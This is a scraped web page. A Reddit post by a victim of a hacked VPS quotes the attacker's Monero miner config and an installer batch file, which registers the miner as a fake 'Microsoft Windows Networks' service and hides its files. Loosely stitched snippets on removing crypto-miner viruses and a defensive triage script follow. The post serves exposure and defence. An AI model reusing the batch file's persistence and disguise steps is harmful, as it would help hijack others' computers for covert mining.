Removing the CoinMiner virus - here's how - CHIP

MoneroOcean pool owner supports botnets

Hi guys,
As of late my VPS that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as its configuration file and I'm posting the contents also publicly here:
{
  "algo": "cryptonight",
  "api": {
    "port": 0,
    "access-token": null,
    "id": null,
    "worker-id": null,
    "ipv6": false,
    "restricted": true
  },
  "asm": true,
  "autosave": true,
  "av": 0,
  "background": false,
  "colors": true,
  "cpu-affinity": null,
  "cpu-priority": null,
  "donate-level": 0,
  "huge-pages": true,
  "hw-aes": null,
  "log-file": null,
  "max-cpu-usage": 100,
  "pools": [
    {
      "url": "gulf.moneroocean.stream:80",
      "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq",
      "pass": "x",
      "rig-id": null,
      "nicehash": false,
      "keepalive": false,
      "variant": -1,
      "enabled": true,
      "tls": false,
      "tls-fingerprint": null
    }
  ],
  "print-time": 60,
  "retries": 5,
  "retry-pause": 5,
  "safe": false,
  "threads": [
    { "low_power_mode": 1, "affine_to_cpu": false, "asm": true },
    { "low_power_mode": 1, "affine_to_cpu": false, "asm": true },
    { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }
  ],
  "user-agent": null,
  "watch": true
}
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat*
net stop Networks
taskkill /f /im system.exe
C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe
sc config "Networks20181019" DisplayName= "Networksr20181019"
sc description "Networks20181019" "Microsoft Windows Networks"
Set ProcessName=system.exe
sc start "Networks20181019"
attrib +a +s +r +h C:\WINDOWS\Debug\nat*
echo u/off
del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IPs publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address as well.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero
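
As an added example (not part of the original post), here is a small Python triage of the two artifacts quoted above, the kind of check a responder could run over recovered files. The sample inputs are constructed and abridged from the post with the wallet replaced by a placeholder; the function names, finding labels and the LOOKALIKE_NAMES list are assumptions.

```python
import json
import re
from ntpath import basename

# Constructed samples, abridged from the config.json and cmd.bat quoted in the post.
# The wallet string is replaced by a placeholder.
SAMPLE_CONFIG = '''{"max-cpu-usage": 100, "pools": [
  {"url": "gulf.moneroocean.stream:80", "user": "WALLET_PLACEHOLDER", "tls": false}]}'''
SAMPLE_BATCH = r'''attrib -a -s -r -h C:\WINDOWS\Debug\nat*
C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe
sc description "Networks20181019" "Microsoft Windows Networks"
sc start "Networks20181019"
attrib +a +s +r +h C:\WINDOWS\Debug\nat*'''

# Assumption: names that imitate Windows system processes (hypothetical short list).
LOOKALIKE_NAMES = {"svchost.exe", "system.exe", "lsass.exe", "services.exe"}

def triage_config(text):
    """Return (kind, subject) findings from a miner config."""
    cfg, findings = json.loads(text), []
    for pool in cfg.get("pools", []):
        url = pool.get("url", "")
        findings.append(("pool", url))
        port = url.rpartition(":")[2]
        if port in ("80", "443") and not pool.get("tls"):
            findings.append(("pool-on-web-port", url))
    if cfg.get("max-cpu-usage") == 100:
        findings.append(("cpu-uncapped", "100"))
    return findings

def triage_batch(text):
    """Return (kind, subject) findings from an installer batch file."""
    findings = []
    for line in map(str.strip, text.splitlines()):
        m = re.match(r'(?i)(\S+\.exe)\s+install\s+"([^"]+)"\s+(\S+)', line)
        if m:  # service-wrapper style: <wrapper> install "<service>" <target>
            findings.append(("service-install", m.group(2)))
            for exe in (m.group(1), m.group(3)):
                if basename(exe).lower() in LOOKALIKE_NAMES and "system32" not in exe.lower():
                    findings.append(("masquerading-binary", exe))
        m = re.match(r'(?i)sc\s+description\s+"([^"]+)"\s+"([^"]*microsoft[^"]*)"', line)
        if m:
            findings.append(("vendor-name-in-description", m.group(1)))
        m = re.match(r'(?i)attrib\s+((?:[+-]\w\s+)+)(\S+)', line)
        if m and {"+h", "+s"} <= set(m.group(1).lower().split()):
            findings.append(("hidden-system-attrs", m.group(2)))
    return findings

if __name__ == "__main__":
    for finding in triage_config(SAMPLE_CONFIG) + triage_batch(SAMPLE_BATCH):
        print(*finding, sep="\t")
```

Each finding is a lead for review rather than a verdict: a service name, a binary path or a pool endpoint to check against the host's service list, file system and egress logs.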


Crypto-miner malware infects your PC or other devices like an ordinary virus, but then starts using your device to compute a digital currency. For instance, in order to ... Bitcoins ...

Symptoms Of The Bitcoin Miner Virus. Some of the symptoms of a Bitcoin Miner Virus include: System overheating; GPU and CPU over-usage; Crucial system slow down; Sustained mining as this can break the system’s hardware.

How The Miner Malware Spreads. Due to diverse methods, the Bitcoin Miner Malware can be spread to other places like email attachments and in websites that have been ...

The CoinMiner virus abuses your computer's processing power so that the owner of the virus earns money from compute-intensive calculations. How the principle of BitCoin mining works exactly is explained in this practical tip. Download the free program Malwarebytes Anti-Malware from CHIP and install it. This is an extremely reliable ...

BitCoin miner virus or BitCoin mining virus is a dangerous malware that may use your CPU and/or GPU to obtain BitCoin cryptocurrency by mining illegally. Cryptocurrency miners keep hitting computers and trying to use their resources to generate revenue for their developers. Even though this type of infection is called BitCoinMiner, it does mine for digital currencies such as Monero ...


How to Find and Remove a Hidden Miner Virus on Your PC 🐛🛡️🖥️

Hello! I noticed my computer was slow, caused by a virus that was mining Bitcoins on my computer. In this video you can follow how I solved the problem. Production and editing: Me ...

BitcoinMiner is a Malware that was designed to force your computer to mine crypto-currency that is called Bitcoin. When the Bitcoins have been mined on the computer’s system, the designer of this...

This video is simply some unedited footage that I was preparing to show how malware that masquerades as a Realtek Audio Driver sits and uses system resources to mine Bitcoin for the malware author.

👍 Watch how to remove a hidden Bitcoin mining virus from your computer. If you noticed that your computer – while you’re not using it - still behaves as if i...

Remove bitcoin miner trojan Virus (Virus Removal Guide) Visit Site :- https://www.uninstallallpcvirus.com/remove-bitcoin-miner-trojan-virus-virus-removal-gui...
